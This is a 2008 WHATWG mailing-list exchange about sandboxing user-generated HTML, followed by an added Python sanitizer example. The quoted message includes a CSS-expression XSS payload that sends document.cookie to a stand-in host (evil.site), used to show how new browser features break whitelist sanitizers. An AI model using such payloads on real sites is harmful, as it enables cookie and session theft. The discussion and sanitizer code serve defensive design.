- From: Kristof Zelechovski <giecrilj@stegny.2a.pl>
- Date: Tue, 17 Jun 2008 23:36:23 +0200
This particular explanation is irrelevant to the topic because sandboxed fragments can contain scripts, whether within CSS or not. The idea of sandboxing is to disable scripts, not to purge them.

Chris

-----Original Message-----
From: whatwg-bounces@lists.whatwg.org [mailto:whatwg-bounces at lists.whatwg.org] On Behalf Of Frode Borli
Sent: Tuesday, June 17, 2008 8:34 PM
To: Kristof Zelechovski
Cc: whatwg at lists.whatwg.org
Subject: Re: [whatwg] Sandboxing to accommodate user generated content.

> 1. Please elaborate how an extension of CSS would require a sanitizer
> update.

In the year 1998: A sanitizer algorithm works perfectly for all existing methods of adding scripts. It uses a white list, which allows only certain tags and attributes. Among the allowed attributes are colspan, rowspan and style - since the web developer wants users to be able to build tables and style them properly.

In the year 1999 Internet Explorer 5.0 is introduced, and it introduces a new invention: CSS-expressions. Suddenly the formerly secure web application is no longer secure. A user adds the following code, and it passes the sanitizer easily:

<span style='color: blue; width: expression(document.write("<img src=http://evil.site/"+document.cookie));'></span>

I am absolutely certain that there will be other, brilliant inventions in the future which will break sanitizers - of course we can't know which inventions today - but the sandboxing means that browser vendors in the future can prevent the above scenario.
Received on Tuesday, 17 June 2008 14:36:23 UTC
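
An added illustration, not part of either message and not code from any project discussed on the list: a whitelist sanitizer in Python that, like the 1998 one described in the quoted message, passes `style` through unexamined, next to a variant that keeps only CSS declarations matching a strict per-property grammar. The tag list, the `SAFE_CSS` policy and all function names are assumptions made for the example.

```python
import re
from html import escape
from html.parser import HTMLParser

ALLOWED_TAGS = {"span", "table", "tr", "td"}       # assumed whitelist
ALLOWED_ATTRS = {"colspan", "rowspan", "style"}    # attributes named in the message
# Assumed policy: each permitted CSS property has a strict value grammar.
SAFE_CSS = {"color": re.compile(r"#[0-9a-f]{3,6}|[a-z]{3,20}", re.I),
            "width": re.compile(r"\d{1,4}(px|em|%)")}
# The markup quoted in the message above.
SAMPLE = ("<span style='color: blue; width: expression(document.write("
          "\"<img src=http://evil.site/\"+document.cookie));'></span>")

def filter_style(value):
    """Keep only declarations whose property and value match SAFE_CSS."""
    kept = []
    for decl in value.split(";"):
        prop, _, val = (part.strip() for part in decl.partition(":"))
        rule = SAFE_CSS.get(prop.lower())
        if rule and rule.fullmatch(val):
            kept.append(f"{prop.lower()}: {val}")
    return "; ".join(kept)

class Sanitizer(HTMLParser):
    def __init__(self, check_style):
        super().__init__()
        self.check_style, self.out = check_style, []
    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            return
        parts = [tag]
        for name, value in attrs:
            if name == "style" and self.check_style:
                value = filter_style(value or "")  # unknown syntax is dropped
            if name in ALLOWED_ATTRS and value:
                parts.append(f'{name}="{escape(value)}"')
        self.out.append("<" + " ".join(parts) + ">")

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS:
            self.out.append(f"</{tag}>")
    def handle_data(self, data):
        self.out.append(escape(data, quote=False))

def sanitize(markup, check_style):
    parser = Sanitizer(check_style)
    parser.feed(markup)
    parser.close()
    return "".join(parser.out)
```

With `check_style=False` the `expression(...)` value survives the attribute whitelist; with `check_style=True` only `color: blue` remains, because values are accepted by grammar rather than rejected by known-bad pattern.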